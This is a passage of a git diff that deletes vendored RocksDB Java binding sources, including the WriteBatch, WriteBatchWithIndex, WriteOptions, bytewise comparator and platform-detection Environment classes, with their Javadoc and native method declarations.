-      final int keyLen, final byte[] value, final int valueLen,
-      final long cfHandle);
-  @Override final native void merge(final long handle, final byte[] key,
-      final int keyLen, final byte[] value, final int valueLen);
-  @Override final native void merge(final long handle, final byte[] key,
-      final int keyLen, final byte[] value, final int valueLen,
-      final long cfHandle);
-  @Override final native void remove(final long handle, final byte[] key,
-      final int keyLen);
-  @Override final native void remove(final long handle, final byte[] key,
-      final int keyLen, final long cfHandle);
-  @Override
-  final native void deleteRange(final long handle, final byte[] beginKey, final int beginKeyLen,
-      final byte[] endKey, final int endKeyLen);
-  @Override
-  final native void deleteRange(final long handle, final byte[] beginKey, final int beginKeyLen,
-      final byte[] endKey, final int endKeyLen, final long cfHandle);
-  @Override final native void putLogData(final long handle,
-      final byte[] blob, final int blobLen);
-  @Override final native void clear0(final long handle);
-  @Override final native void setSavePoint0(final long handle);
-  @Override final native void rollbackToSavePoint0(final long handle);
-
-  private native static long newWriteBatch(final int reserved_bytes);
-  private native void iterate(final long handle, final long handlerHandle)
-      throws RocksDBException;
-
-
-  /**
-   * Handler callback for iterating over the contents of a batch.
-   */
-  public static abstract class Handler
-      extends AbstractImmutableNativeReference {
-    private final long nativeHandle_;
-    public Handler() {
-      super(true);
-      this.nativeHandle_ = createNewHandler0();
-    }
-
-    public abstract void put(byte[] key, byte[] value);
-    public abstract void merge(byte[] key, byte[] value);
-    public abstract void delete(byte[] key);
-    public abstract void deleteRange(byte[] beginKey, byte[] endKey);
-    public abstract void logData(byte[] blob);
-
-    /**
-     * shouldContinue is called by the underlying iterator
-     * WriteBatch::Iterate. If it returns false,
-     * iteration is halted. Otherwise, it continues
-     * iterating. The default implementation always
-     * returns true.
-     *
-     * @return boolean value indicating if the
-     *     iteration is halted.
-     */
-    public boolean shouldContinue() {
-      return true;
-    }
-
-    /**
-     * Deletes underlying C++ handler pointer.
-     */
-    @Override
-    protected void disposeInternal() {
-      disposeInternal(nativeHandle_);
-    }
-
-    private native long createNewHandler0();
-    private native void disposeInternal(final long handle);
-  }
-}
diff --git a/thirdparty/rocksdb/java/src/main/java/org/rocksdb/WriteBatchInterface.java b/thirdparty/rocksdb/java/src/main/java/org/rocksdb/WriteBatchInterface.java
deleted file mode 100644
index cd024ad..0000000
--- a/thirdparty/rocksdb/java/src/main/java/org/rocksdb/WriteBatchInterface.java
+++ /dev/null
@@ -1,146 +0,0 @@
-// Copyright (c) 2011-present, Facebook, Inc.  All rights reserved.
-//  This source code is licensed under both the GPLv2 (found in the
-//  COPYING file in the root directory) and Apache 2.0 License
-//  (found in the LICENSE.Apache file in the root directory).
-
-package org.rocksdb;
-
-/**
- * <p>Defines the interface for a Write Batch which
- * holds a collection of updates to apply atomically to a DB.</p>
- */
-public interface WriteBatchInterface {
-
-    /**
-     * Returns the number of updates in the batch.
-     *
-     * @return number of items in WriteBatch
-     */
-    int count();
-
-    /**
-     * <p>Store the mapping "key-&gt;value" in the database.</p>
-     *
-     * @param key the specified key to be inserted.
-     * @param value the value associated with the specified key.
-     */
-    void put(byte[] key, byte[] value);
-
-    /**
-     * <p>Store the mapping "key-&gt;value" within given column
-     * family.</p>
-     *
-     * @param columnFamilyHandle {@link org.rocksdb.ColumnFamilyHandle}
-     *     instance
-     * @param key the specified key to be inserted.
-     * @param value the value associated with the specified key.
-     */
-    void put(ColumnFamilyHandle columnFamilyHandle,
-                    byte[] key, byte[] value);
-
-    /**
-     * <p>Merge "value" with the existing value of "key" in the database.
-     * "key-&gt;merge(existing, value)"</p>
-     *
-     * @param key the specified key to be merged.
-     * @param value the value to be merged with the current value for
-     * the specified key.
-     */
-    void merge(byte[] key, byte[] value);
-
-    /**
-     * <p>Merge "value" with the existing value of "key" in given column family.
-     * "key-&gt;merge(existing, value)"</p>
-     *
-     * @param columnFamilyHandle {@link ColumnFamilyHandle} instance
-     * @param key the specified key to be merged.
-     * @param value the value to be merged with the current value for
-     * the specified key.
-     */
-    void merge(ColumnFamilyHandle columnFamilyHandle,
-                      byte[] key, byte[] value);
-
-    /**
-     * <p>If the database contains a mapping for "key", erase it.  Else do nothing.</p>
-     *
-     * @param key Key to delete within database
-     */
-    void remove(byte[] key);
-
-    /**
-     * <p>If column family contains a mapping for "key", erase it.  Else do nothing.</p>
-     *
-     * @param columnFamilyHandle {@link ColumnFamilyHandle} instance
-     * @param key Key to delete within database
-     */
-    void remove(ColumnFamilyHandle columnFamilyHandle, byte[] key);
-
-    /**
-     * Removes the database entries in the range ["beginKey", "endKey"), i.e.,
-     * including "beginKey" and excluding "endKey". a non-OK status on error. It
-     * is not an error if no keys exist in the range ["beginKey", "endKey").
-     *
-     * Delete the database entry (if any) for "key". Returns OK on success, and a
-     * non-OK status on error. It is not an error if "key" did not exist in the
-     * database.
-     *
-     * @param beginKey
-     *          First key to delete within database (included)
-     * @param endKey
-     *          Last key to delete within database (excluded)
-     */
-    void deleteRange(byte[] beginKey, byte[] endKey);
-
-    /**
-     * Removes the database entries in the range ["beginKey", "endKey"), i.e.,
-     * including "beginKey" and excluding "endKey". a non-OK status on error. It
-     * is not an error if no keys exist in the range ["beginKey", "endKey").
-     *
-     * Delete the database entry (if any) for "key". Returns OK on success, and a
-     * non-OK status on error. It is not an error if "key" did not exist in the
-     * database.
-     *
-     * @param columnFamilyHandle {@link ColumnFamilyHandle} instance
-     * @param beginKey
-     *          First key to delete within database (included)
-     * @param endKey
-     *          Last key to delete within database (excluded)
-     */
-    void deleteRange(ColumnFamilyHandle columnFamilyHandle, byte[] beginKey, byte[] endKey);
-
-    /**
-     * Append a blob of arbitrary size to the records in this batch. The blob will
-     * be stored in the transaction log but not in any other file. In particular,
-     * it will not be persisted to the SST files. When iterating over this
-     * WriteBatch, WriteBatch::Handler::LogData will be called with the contents
-     * of the blob as it is encountered. Blobs, puts, deletes, and merges will be
-     * encountered in the same order in thich they were inserted. The blob will
-     * NOT consume sequence number(s) and will NOT increase the count of the batch
-     *
-     * Example application: add timestamps to the transaction log for use in
-     * replication.
-     *
-     * @param blob binary object to be inserted
-     */
-    void putLogData(byte[] blob);
-
-    /**
-     * Clear all updates buffered in this batch
-     */
-    void clear();
-
-    /**
-     * Records the state of the batch for future calls to RollbackToSavePoint().
-     * May be called multiple times to set multiple save points.
-     */
-    void setSavePoint();
-
-    /**
-     * Remove all entries in this batch (Put, Merge, Delete, PutLogData) since
-     * the most recent call to SetSavePoint() and removes the most recent save
-     * point.
-     *
-     * @throws RocksDBException if there is no previous call to SetSavePoint()
-     */
-    void rollbackToSavePoint() throws RocksDBException;
-}
diff --git a/thirdparty/rocksdb/java/src/main/java/org/rocksdb/WriteBatchWithIndex.java b/thirdparty/rocksdb/java/src/main/java/org/rocksdb/WriteBatchWithIndex.java
deleted file mode 100644
index fdf89b2..0000000
--- a/thirdparty/rocksdb/java/src/main/java/org/rocksdb/WriteBatchWithIndex.java
+++ /dev/null
@@ -1,282 +0,0 @@
-// Copyright (c) 2011-present, Facebook, Inc.  All rights reserved.
-//  This source code is licensed under both the GPLv2 (found in the
-//  COPYING file in the root directory) and Apache 2.0 License
-//  (found in the LICENSE.Apache file in the root directory).
-
-package org.rocksdb;
-
-/**
- * Similar to {@link org.rocksdb.WriteBatch} but with a binary searchable
- * index built for all the keys inserted.
- *
- * Calling put, merge, remove or putLogData calls the same function
- * as with {@link org.rocksdb.WriteBatch} whilst also building an index.
- *
- * A user can call {@link org.rocksdb.WriteBatchWithIndex#newIterator()} to
- * create an iterator over the write batch or
- * {@link org.rocksdb.WriteBatchWithIndex#newIteratorWithBase(org.rocksdb.RocksIterator)}
- * to get an iterator for the database with Read-Your-Own-Writes like capability
- */
-public class WriteBatchWithIndex extends AbstractWriteBatch {
-  /**
-   * Creates a WriteBatchWithIndex where no bytes
-   * are reserved up-front, bytewise comparison is
-   * used for fallback key comparisons,
-   * and duplicate keys operations are retained
-   */
-  public WriteBatchWithIndex() {
-    super(newWriteBatchWithIndex());
-  }
-
-
-  /**
-   * Creates a WriteBatchWithIndex where no bytes
-   * are reserved up-front, bytewise comparison is
-   * used for fallback key comparisons, and duplicate key
-   * assignment is determined by the constructor argument
-   *
-   * @param overwriteKey if true, overwrite the key in the index when
-   *   inserting a duplicate key, in this way an iterator will never
-   *   show two entries with the same key.
-   */
-  public WriteBatchWithIndex(final boolean overwriteKey) {
-    super(newWriteBatchWithIndex(overwriteKey));
-  }
-
-  /**
-   * Creates a WriteBatchWithIndex
-   *
-   * @param fallbackIndexComparator We fallback to this comparator
-   *  to compare keys within a column family if we cannot determine
-   *  the column family and so look up it's comparator.
-   *
-   * @param reservedBytes reserved bytes in underlying WriteBatch
-   *
-   * @param overwriteKey if true, overwrite the key in the index when
-   *   inserting a duplicate key, in this way an iterator will never
-   *   show two entries with the same key.
-   */
-  public WriteBatchWithIndex(
-      final AbstractComparator<? extends AbstractSlice<?>>
-          fallbackIndexComparator, final int reservedBytes,
-      final boolean overwriteKey) {
-    super(newWriteBatchWithIndex(fallbackIndexComparator.getNativeHandle(),
-        reservedBytes, overwriteKey));
-  }
-
-  /**
-   * Create an iterator of a column family. User can call
-   * {@link org.rocksdb.RocksIteratorInterface#seek(byte[])} to
-   * search to the next entry of or after a key. Keys will be iterated in the
-   * order given by index_comparator. For multiple updates on the same key,
-   * each update will be returned as a separate entry, in the order of update
-   * time.
-   *
-   * @param columnFamilyHandle The column family to iterate over
-   * @return An iterator for the Write Batch contents, restricted to the column
-   * family
-   */
-  public WBWIRocksIterator newIterator(
-      final ColumnFamilyHandle columnFamilyHandle) {
-    return new WBWIRocksIterator(this, iterator1(nativeHandle_,
-            columnFamilyHandle.nativeHandle_));
-  }
-
-  /**
-   * Create an iterator of the default column family. User can call
-   * {@link org.rocksdb.RocksIteratorInterface#seek(byte[])} to
-   * search to the next entry of or after a key. Keys will be iterated in the
-   * order given by index_comparator. For multiple updates on the same key,
-   * each update will be returned as a separate entry, in the order of update
-   * time.
-   *
-   * @return An iterator for the Write Batch contents
-   */
-  public WBWIRocksIterator newIterator() {
-    return new WBWIRocksIterator(this, iterator0(nativeHandle_));
-  }
-
-  /**
-   * Provides Read-Your-Own-Writes like functionality by
-   * creating a new Iterator that will use {@link org.rocksdb.WBWIRocksIterator}
-   * as a delta and baseIterator as a base
-   *
-   * @param columnFamilyHandle The column family to iterate over
-   * @param baseIterator The base iterator,
-   *   e.g. {@link org.rocksdb.RocksDB#newIterator()}
-   * @return An iterator which shows a view comprised of both the database
-   * point-in-time from baseIterator and modifications made in this write batch.
-   */
-  public RocksIterator newIteratorWithBase(
-      final ColumnFamilyHandle columnFamilyHandle,
-      final RocksIterator baseIterator) {
-    RocksIterator iterator = new RocksIterator(
-        baseIterator.parent_,
-        iteratorWithBase(nativeHandle_,
-                columnFamilyHandle.nativeHandle_,
-                baseIterator.nativeHandle_));
-    //when the iterator is deleted it will also delete the baseIterator
-    baseIterator.disOwnNativeHandle();
-    return iterator;
-  }
-
-  /**
-   * Provides Read-Your-Own-Writes like functionality by
-   * creating a new Iterator that will use {@link org.rocksdb.WBWIRocksIterator}
-   * as a delta and baseIterator as a base. Operates on the default column
-   * family.
-   *
-   * @param baseIterator The base iterator,
-   *   e.g. {@link org.rocksdb.RocksDB#newIterator()}
-   * @return An iterator which shows a view comprised of both the database
-   * point-in-timefrom baseIterator and modifications made in this write batch.
-   */
-  public RocksIterator newIteratorWithBase(final RocksIterator baseIterator) {
-    return newIteratorWithBase(baseIterator.parent_.getDefaultColumnFamily(),
-        baseIterator);
-  }
-
-  /**
-   * Similar to {@link RocksDB#get(ColumnFamilyHandle, byte[])} but will only
-   * read the key from this batch.
-   *
-   * @param columnFamilyHandle The column family to retrieve the value from
-   * @param options The database options to use
-   * @param key The key to read the value for
-   *
-   * @return a byte array storing the value associated with the input key if
-   *     any. null if it does not find the specified key.
-   *
-   * @throws RocksDBException if the batch does not have enough data to resolve
-   * Merge operations, MergeInProgress status may be returned.
-   */
-  public byte[] getFromBatch(final ColumnFamilyHandle columnFamilyHandle,
-      final DBOptions options, final byte[] key) throws RocksDBException {
-    return getFromBatch(nativeHandle_, options.nativeHandle_,
-        key, key.length, columnFamilyHandle.nativeHandle_);
-  }
-
-  /**
-   * Similar to {@link RocksDB#get(byte[])} but will only
-   * read the key from this batch.
-   *
-   * @param options The database options to use
-   * @param key The key to read the value for
-   *
-   * @return a byte array storing the value associated with the input key if
-   *     any. null if it does not find the specified key.
-   *
-   * @throws RocksDBException if the batch does not have enough data to resolve
-   * Merge operations, MergeInProgress status may be returned.
-   */
-  public byte[] getFromBatch(final DBOptions options, final byte[] key)
-      throws RocksDBException {
-    return getFromBatch(nativeHandle_, options.nativeHandle_, key, key.length);
-  }
-
-  /**
-   * Similar to {@link RocksDB#get(ColumnFamilyHandle, byte[])} but will also
-   * read writes from this batch.
-   *
-   * This function will query both this batch and the DB and then merge
-   * the results using the DB's merge operator (if the batch contains any
-   * merge requests).
-   *
-   * Setting {@link ReadOptions#setSnapshot(long, long)} will affect what is
-   * read from the DB but will NOT change which keys are read from the batch
-   * (the keys in this batch do not yet belong to any snapshot and will be
-   * fetched regardless).
-   *
-   * @param db The Rocks database
-   * @param columnFamilyHandle The column family to retrieve the value from
-   * @param options The read options to use
-   * @param key The key to read the value for
-   *
-   * @return a byte array storing the value associated with the input key if
-   *     any. null if it does not find the specified key.
-   *
-   * @throws RocksDBException if the value for the key cannot be read
-   */
-  public byte[] getFromBatchAndDB(final RocksDB db, final ColumnFamilyHandle columnFamilyHandle,
-      final ReadOptions options, final byte[] key) throws RocksDBException {
-    return getFromBatchAndDB(nativeHandle_, db.nativeHandle_,
-        options.nativeHandle_, key, key.length,
-        columnFamilyHandle.nativeHandle_);
-  }
-
-  /**
-   * Similar to {@link RocksDB#get(byte[])} but will also
-   * read writes from this batch.
-   *
-   * This function will query both this batch and the DB and then merge
-   * the results using the DB's merge operator (if the batch contains any
-   * merge requests).
-   *
-   * Setting {@link ReadOptions#setSnapshot(long, long)} will affect what is
-   * read from the DB but will NOT change which keys are read from the batch
-   * (the keys in this batch do not yet belong to any snapshot and will be
-   * fetched regardless).
-   *
-   * @param db The Rocks database
-   * @param options The read options to use
-   * @param key The key to read the value for
-   *
-   * @return a byte array storing the value associated with the input key if
-   *     any. null if it does not find the specified key.
-   *
-   * @throws RocksDBException if the value for the key cannot be read
-   */
-  public byte[] getFromBatchAndDB(final RocksDB db, final ReadOptions options,
-      final byte[] key) throws RocksDBException {
-    return getFromBatchAndDB(nativeHandle_, db.nativeHandle_,
-        options.nativeHandle_, key, key.length);
-  }
-
-  @Override protected final native void disposeInternal(final long handle);
-  @Override final native int count0(final long handle);
-  @Override final native void put(final long handle, final byte[] key,
-      final int keyLen, final byte[] value, final int valueLen);
-  @Override final native void put(final long handle, final byte[] key,
-      final int keyLen, final byte[] value, final int valueLen,
-      final long cfHandle);
-  @Override final native void merge(final long handle, final byte[] key,
-      final int keyLen, final byte[] value, final int valueLen);
-  @Override final native void merge(final long handle, final byte[] key,
-      final int keyLen, final byte[] value, final int valueLen,
-      final long cfHandle);
-  @Override final native void remove(final long handle, final byte[] key,
-      final int keyLen);
-  @Override final native void remove(final long handle, final byte[] key,
-      final int keyLen, final long cfHandle);
-  @Override
-  final native void deleteRange(final long handle, final byte[] beginKey, final int beginKeyLen,
-      final byte[] endKey, final int endKeyLen);
-  @Override
-  final native void deleteRange(final long handle, final byte[] beginKey, final int beginKeyLen,
-      final byte[] endKey, final int endKeyLen, final long cfHandle);
-  @Override final native void putLogData(final long handle, final byte[] blob,
-      final int blobLen);
-  @Override final native void clear0(final long handle);
-  @Override final native void setSavePoint0(final long handle);
-  @Override final native void rollbackToSavePoint0(final long handle);
-
-  private native static long newWriteBatchWithIndex();
-  private native static long newWriteBatchWithIndex(final boolean overwriteKey);
-  private native static long newWriteBatchWithIndex(
-      final long fallbackIndexComparatorHandle, final int reservedBytes,
-      final boolean overwriteKey);
-  private native long iterator0(final long handle);
-  private native long iterator1(final long handle, final long cfHandle);
-  private native long iteratorWithBase(final long handle,
-      final long baseIteratorHandle, final long cfHandle);
-  private native byte[] getFromBatch(final long handle, final long optHandle,
-      final byte[] key, final int keyLen);
-  private native byte[] getFromBatch(final long handle, final long optHandle,
-      final byte[] key, final int keyLen, final long cfHandle);
-  private native byte[] getFromBatchAndDB(final long handle,
-      final long dbHandle,  final long readOptHandle, final byte[] key,
-      final int keyLen);
-  private native byte[] getFromBatchAndDB(final long handle,
-      final long dbHandle, final long readOptHandle, final byte[] key,
-      final int keyLen, final long cfHandle);
-}
diff --git a/thirdparty/rocksdb/java/src/main/java/org/rocksdb/WriteOptions.java b/thirdparty/rocksdb/java/src/main/java/org/rocksdb/WriteOptions.java
deleted file mode 100644
index b9e8ad8..0000000
--- a/thirdparty/rocksdb/java/src/main/java/org/rocksdb/WriteOptions.java
+++ /dev/null
@@ -1,159 +0,0 @@
-// Copyright (c) 2011-present, Facebook, Inc.  All rights reserved.
-//  This source code is licensed under both the GPLv2 (found in the
-//  COPYING file in the root directory) and Apache 2.0 License
-//  (found in the LICENSE.Apache file in the root directory).
-
-package org.rocksdb;
-
-/**
- * Options that control write operations.
- *
- * Note that developers should call WriteOptions.dispose() to release the
- * c++ side memory before a WriteOptions instance runs out of scope.
- */
-public class WriteOptions extends RocksObject {
-  /**
-   * Construct WriteOptions instance.
-   */
-  public WriteOptions() {
-    super(newWriteOptions());
-
-  }
-
-  /**
-   * If true, the write will be flushed from the operating system
-   * buffer cache (by calling WritableFile::Sync()) before the write
-   * is considered complete.  If this flag is true, writes will be
-   * slower.
-   *
-   * If this flag is false, and the machine crashes, some recent
-   * writes may be lost.  Note that if it is just the process that
-   * crashes (i.e., the machine does not reboot), no writes will be
-   * lost even if sync==false.
-   *
-   * In other words, a DB write with sync==false has similar
-   * crash semantics as the "write()" system call.  A DB write
-   * with sync==true has similar crash semantics to a "write()"
-   * system call followed by "fdatasync()".
-   *
-   * Default: false
-   *
-   * @param flag a boolean flag to indicate whether a write
-   *     should be synchronized.
-   * @return the instance of the current WriteOptions.
-   */
-  public WriteOptions setSync(final boolean flag) {
-    setSync(nativeHandle_, flag);
-    return this;
-  }
-
-  /**
-   * If true, the write will be flushed from the operating system
-   * buffer cache (by calling WritableFile::Sync()) before the write
-   * is considered complete.  If this flag is true, writes will be
-   * slower.
-   *
-   * If this flag is false, and the machine crashes, some recent
-   * writes may be lost.  Note that if it is just the process that
-   * crashes (i.e., the machine does not reboot), no writes will be
-   * lost even if sync==false.
-   *
-   * In other words, a DB write with sync==false has similar
-   * crash semantics as the "write()" system call.  A DB write
-   * with sync==true has similar crash semantics to a "write()"
-   * system call followed by "fdatasync()".
-   *
-   * @return boolean value indicating if sync is active.
-   */
-  public boolean sync() {
-    return sync(nativeHandle_);
-  }
-
-  /**
-   * If true, writes will not first go to the write ahead log,
-   * and the write may got lost after a crash.
-   *
-   * @param flag a boolean flag to specify whether to disable
-   *     write-ahead-log on writes.
-   * @return the instance of the current WriteOptions.
-   */
-  public WriteOptions setDisableWAL(final boolean flag) {
-    setDisableWAL(nativeHandle_, flag);
-    return this;
-  }
-
-  /**
-   * If true, writes will not first go to the write ahead log,
-   * and the write may got lost after a crash.
-   *
-   * @return boolean value indicating if WAL is disabled.
-   */
-  public boolean disableWAL() {
-    return disableWAL(nativeHandle_);
-  }
-
-  /**
-   * If true and if user is trying to write to column families that don't exist
-   * (they were dropped), ignore the write (don't return an error). If there
-   * are multiple writes in a WriteBatch, other writes will succeed.
-   *
-   * Default: false
-   *
-   * @param ignoreMissingColumnFamilies true to ignore writes to column families
-   *     which don't exist
-   * @return the instance of the current WriteOptions.
-   */
-  public WriteOptions setIgnoreMissingColumnFamilies(
-      final boolean ignoreMissingColumnFamilies) {
-    setIgnoreMissingColumnFamilies(nativeHandle_, ignoreMissingColumnFamilies);
-    return this;
-  }
-
-  /**
-   * If true and if user is trying to write to column families that don't exist
-   * (they were dropped), ignore the write (don't return an error). If there
-   * are multiple writes in a WriteBatch, other writes will succeed.
-   *
-   * Default: false
-   *
-   * @return true if writes to column families which don't exist are ignored
-   */
-  public boolean ignoreMissingColumnFamilies() {
-    return ignoreMissingColumnFamilies(nativeHandle_);
-  }
-
-  /**
-   * If true and we need to wait or sleep for the write request, fails
-   * immediately with {@link Status.Code#Incomplete}.
-   *
-   * @param noSlowdown true to fail write requests if we need to wait or sleep
-   * @return the instance of the current WriteOptions.
-   */
-  public WriteOptions setNoSlowdown(final boolean noSlowdown) {
-    setNoSlowdown(nativeHandle_, noSlowdown);
-    return this;
-  }
-
-  /**
-   * If true and we need to wait or sleep for the write request, fails
-   * immediately with {@link Status.Code#Incomplete}.
-   *
-   * @return true when write requests are failed if we need to wait or sleep
-   */
-  public boolean noSlowdown() {
-    return noSlowdown(nativeHandle_);
-  }
-
-  private native static long newWriteOptions();
-  private native void setSync(long handle, boolean flag);
-  private native boolean sync(long handle);
-  private native void setDisableWAL(long handle, boolean flag);
-  private native boolean disableWAL(long handle);
-  private native void setIgnoreMissingColumnFamilies(final long handle,
-      final boolean ignoreMissingColumnFamilies);
-  private native boolean ignoreMissingColumnFamilies(final long handle);
-  private native void setNoSlowdown(final long handle,
-      final boolean noSlowdown);
-  private native boolean noSlowdown(final long handle);
-  @Override protected final native void disposeInternal(final long handle);
-}
diff --git a/thirdparty/rocksdb/java/src/main/java/org/rocksdb/util/BytewiseComparator.java b/thirdparty/rocksdb/java/src/main/java/org/rocksdb/util/BytewiseComparator.java
deleted file mode 100644
index 18f7391..0000000
--- a/thirdparty/rocksdb/java/src/main/java/org/rocksdb/util/BytewiseComparator.java
+++ /dev/null
@@ -1,91 +0,0 @@
-// Copyright (c) 2011-present, Facebook, Inc.  All rights reserved.
-//  This source code is licensed under both the GPLv2 (found in the
-//  COPYING file in the root directory) and Apache 2.0 License
-//  (found in the LICENSE.Apache file in the root directory).
-
-package org.rocksdb.util;
-
-import org.rocksdb.*;
-
-import java.nio.ByteBuffer;
-
-/**
- * This is a Java Native implementation of the C++
- * equivalent BytewiseComparatorImpl using {@link Slice}
- *
- * The performance of Comparators implemented in Java is always
- * less than their C++ counterparts due to the bridging overhead,
- * as such you likely don't want to use this apart from benchmarking
- * and you most likely instead wanted
- * {@link org.rocksdb.BuiltinComparator#BYTEWISE_COMPARATOR}
- */
-public class BytewiseComparator extends Comparator {
-
-  public BytewiseComparator(final ComparatorOptions copt) {
-    super(copt);
-  }
-
-  @Override
-  public String name() {
-    return "rocksdb.java.BytewiseComparator";
-  }
-
-  @Override
-  public int compare(final Slice a, final Slice b) {
-    return compare(a.data(), b.data());
-  }
-
-  @Override
-  public String findShortestSeparator(final String start,
-                                      final Slice limit) {
-    final byte[] startBytes = start.getBytes();
-    final byte[] limitBytes = limit.data();
-
-    // Find length of common prefix
-    final int min_length = Math.min(startBytes.length, limit.size());
-    int diff_index = 0;
-    while ((diff_index < min_length) &&
-        (startBytes[diff_index] == limitBytes[diff_index])) {
-      diff_index++;
-    }
-
-    if (diff_index >= min_length) {
-      // Do not shorten if one string is a prefix of the other
-    } else {
-      final byte diff_byte = startBytes[diff_index];
-      if(diff_byte < 0xff && diff_byte + 1 < limitBytes[diff_index]) {
-        final byte shortest[] = new byte[diff_index + 1];
-        System.arraycopy(startBytes, 0, shortest, 0, diff_index + 1);
-        shortest[diff_index]++;
-        assert(compare(shortest, limitBytes) < 0);
-        return new String(shortest);
-      }
-    }
-
-    return null;
-  }
-
-  private static int compare(final byte[] a, final byte[] b) {
-    return ByteBuffer.wrap(a).compareTo(ByteBuffer.wrap(b));
-  }
-
-  @Override
-  public String findShortSuccessor(final String key) {
-    final byte[] keyBytes = key.getBytes();
-
-    // Find first character that can be incremented
-    final int n = keyBytes.length;
-    for (int i = 0; i < n; i++) {
-      final byte byt = keyBytes[i];
-      if (byt != 0xff) {
-        final byte shortSuccessor[] = new byte[i + 1];
-        System.arraycopy(keyBytes, 0, shortSuccessor, 0, i + 1);
-        shortSuccessor[i]++;
-        return new String(shortSuccessor);
-      }
-    }
-    // *key is a run of 0xffs.  Leave it alone.
-
-    return null;
-  }
-}
diff --git a/thirdparty/rocksdb/java/src/main/java/org/rocksdb/util/DirectBytewiseComparator.java b/thirdparty/rocksdb/java/src/main/java/org/rocksdb/util/DirectBytewiseComparator.java
deleted file mode 100644
index 9417544..0000000
--- a/thirdparty/rocksdb/java/src/main/java/org/rocksdb/util/DirectBytewiseComparator.java
+++ /dev/null
@@ -1,88 +0,0 @@
-// Copyright (c) 2011-present, Facebook, Inc.  All rights reserved.
-//  This source code is licensed under both the GPLv2 (found in the
-//  COPYING file in the root directory) and Apache 2.0 License
-//  (found in the LICENSE.Apache file in the root directory).
-
-package org.rocksdb.util;
-
-import org.rocksdb.ComparatorOptions;
-import org.rocksdb.DirectComparator;
-import org.rocksdb.DirectSlice;
-
-import java.nio.ByteBuffer;
-
-/**
- * This is a Java Native implementation of the C++
- * equivalent BytewiseComparatorImpl using {@link DirectSlice}
- *
- * The performance of Comparators implemented in Java is always
- * less than their C++ counterparts due to the bridging overhead,
- * as such you likely don't want to use this apart from benchmarking
- * and you most likely instead wanted
- * {@link org.rocksdb.BuiltinComparator#BYTEWISE_COMPARATOR}
- */
-public class DirectBytewiseComparator extends DirectComparator {
-
-  public DirectBytewiseComparator(final ComparatorOptions copt) {
-    super(copt);
-  }
-
-  @Override
-  public String name() {
-    return "rocksdb.java.DirectBytewiseComparator";
-  }
-
-  @Override
-  public int compare(final DirectSlice a, final DirectSlice b) {
-    return a.data().compareTo(b.data());
-  }
-
-  @Override
-  public String findShortestSeparator(final String start,
-      final DirectSlice limit) {
-    final byte[] startBytes = start.getBytes();
-
-    // Find length of common prefix
-    final int min_length = Math.min(startBytes.length, limit.size());
-    int diff_index = 0;
-    while ((diff_index < min_length) &&
-        (startBytes[diff_index] == limit.get(diff_index))) {
-      diff_index++;
-    }
-
-    if (diff_index >= min_length) {
-      // Do not shorten if one string is a prefix of the other
-    } else {
-      final byte diff_byte = startBytes[diff_index];
-      if(diff_byte < 0xff && diff_byte + 1 < limit.get(diff_index)) {
-        final byte shortest[] = new byte[diff_index + 1];
-        System.arraycopy(startBytes, 0, shortest, 0, diff_index + 1);
-        shortest[diff_index]++;
-        assert(ByteBuffer.wrap(shortest).compareTo(limit.data()) < 0);
-        return new String(shortest);
-      }
-    }
-
-    return null;
-  }
-
-  @Override
-  public String findShortSuccessor(final String key) {
-    final byte[] keyBytes = key.getBytes();
-
-    // Find first character that can be incremented
-    final int n = keyBytes.length;
-    for (int i = 0; i < n; i++) {
-      final byte byt = keyBytes[i];
-      if (byt != 0xff) {
-        final byte shortSuccessor[] = new byte[i + 1];
-        System.arraycopy(keyBytes, 0, shortSuccessor, 0, i + 1);
-        shortSuccessor[i]++;
-        return new String(shortSuccessor);
-      }
-    }
-    // *key is a run of 0xffs.  Leave it alone.
-
-    return null;
-  }
-}
diff --git a/thirdparty/rocksdb/java/src/main/java/org/rocksdb/util/Environment.java b/thirdparty/rocksdb/java/src/main/java/org/rocksdb/util/Environment.java
deleted file mode 100644
index f84e14b..0000000
--- a/thirdparty/rocksdb/java/src/main/java/org/rocksdb/util/Environment.java
+++ /dev/null
@@ -1,90 +0,0 @@
-package org.rocksdb.util;
-
-public class Environment {
-  private static String OS = System.getProperty("os.name").toLowerCase();
-  private static String ARCH = System.getProperty("os.arch").toLowerCase();
-
-  public static boolean isPowerPC() {
-    return ARCH.contains("ppc");
-  }
-
-  public static boolean isWindows() {
-    return (OS.contains("win"));
-  }
-
-  public static boolean isMac() {
-    return (OS.contains("mac"));
-  }
-
-  public static boolean isAix() {
-    return OS.contains("aix");
-  }
-  
-  public static boolean isUnix() {
-    return OS.contains("nix") ||
-        OS.contains("nux");
-  }
-
-  public static boolean isSolaris() {
-    return OS.contains("sunos");
-  }
-
-  public static boolean is64Bit() {
-    if (ARCH.indexOf("sparcv9") >= 0) {
-      return true;
-    }
-    return (ARCH.indexOf("64") > 0);
-  }
-
-  public static String getSharedLibraryName(final String name) {
-    return name + "jni";
-  }
-
-  public static String getSharedLibraryFileName(final String name) {
-    return appendLibOsSuffix("lib" + getSharedLibraryName(name), true);
-  }
-
-  public static String getJniLibraryName(final String name) {
-    if (isUnix()) {
-      final String arch = is64Bit() ? "64" : "32";
-      if(isPowerPC()) {
-        return String.format("%sjni-linux-%s", name, ARCH);
-      } else {
-        return String.format("%sjni-linux%s", name, arch);
-      }
-    } else if (isMac()) {
-      return String.format("%sjni-osx", name);
-    } else if (isAix() && is64Bit()) {
-      return String.format("%sjni-aix64", name);
-    } else if (isSolaris()) {
-      final String arch = is64Bit() ? "64" : "32";
-      return String.format("%sjni-solaris%s", name, arch);
-    } else if (isWindows() && is64Bit()) {
-      return String.format("%sjni-win64", name);
-    }
-
-    throw new UnsupportedOperationException(String.format("Cannot determine JNI library name for ARCH='%s' OS='%s' name='%s'", ARCH, OS, name));
-  }
-
-  public static String getJniLibraryFileName(final String name) {
-    return appendLibOsSuffix("lib" + getJniLibraryName(name), false);
-  }
-
-  private static String appendLibOsSuffix(final String libraryFileName, final boolean shared) {
-    if (isUnix() || isAix() || isSolaris()) {
-      return libraryFileName + ".so";
-    } else if (isMac()) {
-      return libraryFileName + (shared ? ".dylib" : ".jnilib");
-    } else if (isWindows()) {
-      return libraryFileName + ".dll";
-    }
-    throw new UnsupportedOperationException();
-  }
-
-  public static String getJniLibraryExtension() {
-    if (isWindows()) {
-      return ".dll";
-    }
-    return (isMac()) ? ".jnilib" : ".so";
-  }
-}
diff --git a/thirdparty/rocksdb/java/src/main/java/org/rocksdb/util/ReverseBytewiseComparator.java b/thirdparty/rocksdb/java/src/main/java/org/rocksdb/util/ReverseBytewiseComparator.java
deleted file mode 100644
index 7fbac2f..0000000
